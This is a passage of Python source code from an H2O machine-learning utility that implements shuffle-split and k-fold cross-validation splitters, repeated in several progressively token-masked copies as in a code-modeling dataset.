-------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = 